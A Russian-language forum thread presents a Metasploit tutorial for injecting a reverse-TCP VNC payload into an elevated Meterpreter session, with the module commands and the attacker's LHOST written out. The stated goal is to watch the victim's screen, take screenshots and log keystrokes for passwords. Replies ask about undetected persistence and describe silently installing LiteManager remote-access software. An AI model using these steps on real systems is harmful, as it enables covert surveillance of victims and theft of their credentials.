Захват VNC сессии на удаленном компьютере.

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем Vander, 7 сен 2016.

  1. Vander

    Vander Модератор
    Команда форума

    Регистрация:
    16 янв 2016
    Сообщения:
    302
    Симпатии:
    271
    Привет! Здесь пойдет речь о том как использовать VNC -сервер на удаленном компьютере. Что такое VNC и зачем он нам нужен? Немного теории:

    Virtual Network Computing (VNC) — система удалённого доступа к рабочему столу компьютера, использующая протокол RFB (Remote FrameBuffer, удалённый кадровый буфер). Управление осуществляется путём передачи нажатий клавиш на клавиатуре и движений мыши с одного компьютера на другой и ретрансляции содержимого экрана через компьютерные сети.

    Сразу оговорюсь, что запущенный через шелл meterpreter’a VNC – сервер, к сожалению не позволит нам управлять этим компьютером.

    Вместо этого мы сможем наблюдать за действиями на мониторе жертвы, вовремя делать скриншоты экрана, собирая интересную информацию, параллельно включив кейлоггер, добывать пароли именно от интересующих нас аккаунтов и т.д.

    Приступим, как обычно, перед началом всех манипуляций открываем сессию meterpreter с повышенными привилегиями,

    upload_2016-9-7_14-37-25.png

    (с базовыми получалось на Windows 7. Win 8.1 и 10 только с повышенными), и пишем по порядку, нижеследующее:

    > use windows/manage/payload_inject

    > set payload windows/vncinject/reverse_tcp

    > set LHOST 192.168.0.18 (IP атакуещего)

    > set session 2 (Номер вашей сессии с привилегиями)

    > set handler true

    > exploit

    upload_2016-9-7_14-39-13.png

    Убеждаемся, что все идет успешно:

    upload_2016-9-7_14-39-38.png

    В результате этих действий будет открыто окно VNC – сервера:

    upload_2016-9-7_14-40-14.png

    На этом все, вопросы и пожелания жду в комментариях.
     
    #1 Vander, 7 сен 2016
    Последнее редактирование: 7 сен 2016
    ~~DarkNode~~ и RuineR нравится это.
  2. kuklofon

    kuklofon Parrot Security OS
    Команда форума

    Регистрация:
    28 фев 2016
    Сообщения:
    218
    Симпатии:
    119
    збс, лес как у меня на обоях :)
     
  3. IronBird

    IronBird Member

    Регистрация:
    14 авг 2016
    Сообщения:
    7
    Симпатии:
    4
    Так может это и твой стол?)
     
    Vander нравится это.
  4. kuklofon

    kuklofon Parrot Security OS
    Команда форума

    Регистрация:
    28 фев 2016
    Сообщения:
    218
    Симпатии:
    119
    точно :) спалился
     
  5. Алёша

    Алёша New Member

    Регистрация:
    15 сен 2016
    Сообщения:
    1
    Симпатии:
    0
    кто нибудь знает как беспалевно вживить payload на постоянно?
     
  6. WebWare Team

    WebWare Team Администратор
    Команда форума

    Регистрация:
    30 дек 2015
    Сообщения:
    203
    Симпатии:
    98
    Алексей, здравствуйте. Тема форума Этичный хакинг и тестирование на проникновение.
     
    Vander нравится это.
  7. Triton

    Triton Member

    Регистрация:
    1 окт 2016
    Сообщения:
    12
    Симпатии:
    11
    В отрытой сессии пейлоада:
    Пропишет нагрузку как сервис.
    Справка:
     
    m0tion нравится это.
  8. Ishikawa

    Ishikawa Well-Known Member
    Команда форума

    Регистрация:
    15 ноя 2016
    Сообщения:
    56
    Симпатии:
    42
    Под винду можно LiteManager Server ставить с ключем /silent
    Устанавливается тихо, отрывает TCP 5650, сам ставится в accept firewall
    И можно не только смотреть, но и управлять, режимов масса.
     
    Vander нравится это.
Загрузка...

Поделиться этой страницей